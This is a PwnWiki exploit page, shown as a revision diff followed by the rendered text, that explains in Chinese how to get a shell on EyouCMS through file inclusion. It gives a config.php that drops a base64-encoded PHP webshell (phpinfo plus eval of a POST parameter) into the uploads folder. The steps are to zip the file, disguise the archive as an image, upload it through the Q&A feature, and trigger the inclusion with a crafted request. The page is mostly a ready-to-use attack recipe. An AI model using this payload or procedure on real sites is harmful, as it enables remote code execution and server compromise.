Difference between revisions of "EyouCMS 文件包含Getshell漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> EyouCMS <translate> ==漏洞利用== </translate> <translate> 製作如下結構的壓縮文件: </translate> <pre>...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
EyouCMS | EyouCMS | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
製作如下結構的壓縮文件: | 製作如下結構的壓縮文件: | ||
</translate> | </translate> | ||
| Line 26: | Line 27: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
在提問功能處可以上傳圖片,把惡意壓縮包改成圖片後綴傳上去,得到一個上傳後的圖片路徑,在構造報文觸發文件包含。 | 在提問功能處可以上傳圖片,把惡意壓縮包改成圖片後綴傳上去,得到一個上傳後的圖片路徑,在構造報文觸發文件包含。 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
phpinfo已經成功執行。 | phpinfo已經成功執行。 | ||
</translate> | </translate> | ||
Latest revision as of 19:58, 25 June 2021
漏洞影響
EyouCMS
漏洞利用
製作如下結構的壓縮文件:
-weapp --test ---config.php
config.php:
<?php
file_put_contents("./uploads/allimg/0427bd01edea972d400a106514ab7f68.php",base64_decode("PD9waHAgcGhwaW5mbygp00BldmFsKCRfUE9TVFsyMzNdKTs/Pg=="));
?>
在提問功能處可以上傳圖片,把惡意壓縮包改成圖片後綴傳上去,得到一個上傳後的圖片路徑,在構造報文觸發文件包含。
phpinfo已經成功執行。